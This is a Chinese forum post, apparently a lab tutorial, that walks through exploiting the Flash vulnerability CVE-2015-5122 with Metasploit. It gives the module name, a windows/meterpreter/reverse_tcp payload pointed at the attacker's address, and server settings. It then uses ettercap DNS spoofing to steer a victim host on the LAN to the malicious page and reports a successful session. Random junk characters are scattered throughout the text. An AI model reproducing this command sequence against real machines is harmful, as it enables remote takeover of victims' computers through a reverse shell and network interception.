cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

4 p n( B2 H+ j2 u. S 二、cve2015-5122漏洞实例演示虚拟机 / o* g" J/ W1 @

" l4 O, y% `9 G* C8 g" O8 P 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： h1 \" P3 Q& k. I' Y4 Q' r

2 z3 `4 \. f& ?/ q& e% E search cve-2015-5122如图： * l3 t( ?& x. [' ?4 w

% g! I( D; x4 k* ?, Y ) e- ?! ?/ K. Z$ B( E

5 |, A: L& F( v# o! v: ~ 下面我们敲如下命令： ' s' ^4 T$ W9 u: G7 C

3 Q$ S' y: R) {5 v4 t% a use exploit/multi/browser/adobe_flash_opaque_background_uaf % x6 Z5 j! C3 J

7 A' l8 @; l8 l& u( R) D set PAYLOAD windows/meterpreter/reverse_tcp . L9 w$ y0 |' f9 E3 a

# B0 U6 t. P" F, f set LHOST 192.168.0.109 0 L x% w8 m* a- j6 J# i

/ l3 J% \- x1 r& L$ r set URIPATH / /*根目录*/ & ?( f0 y3 [& X

( h( P+ k! }0 M& h' V, ?7 H3 U set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 1 Y! `7 ]/ E0 z8 s h) K

% u! p8 M: s2 M* ^3 ^ set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 7 e- M* m+ r# Z! V* c/ t

; P# @$ ]: G; C$ k: F# [# c 然后show options如图： & F! U, [7 s# A `) _- O: N+ x

+ y$ {$ n. S+ D5 M- n 7 }( d" R: Z' c! g- _8 }8 ^

, v3 ~5 W" M' I V 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
4 N3 |/ G; }2 y7 s6 H M+ A * k; |3 E& {/ {$ ]2 ~

( M$ \- H) a0 t& o% c( n 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 $ U# L% k$ `4 q! u( X' v; R

1 e% w/ A0 a/ e Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf # S; M# P& [2 W! G; L8 \

: `# W2 ]9 F; K . Q0 ^3 N3 [' E) G; v1 r. E

! P9 S- t" }- h5 v T 成功了，这时候我们断开ettercap，如图： 5 k1 W+ A1 E1 q

: i# E& D. Z7 j) t0 R% D 5 @/ P+ e& M* j2 Y, c+ T! k* Z' h

7 d0 f7 P/ H- | Screenshot如图： V+ ^0 f8 Q4 v+ E, M

& Y5 T' o6 M0 W/ C. J+ p }2 s- {! ~ - G8 _' o: F2 y* X! U

( X2 K4 z5 @: y; a 9 z) P! |( O, i5 l6 N

		自动登录	找回密码
密码			立即注册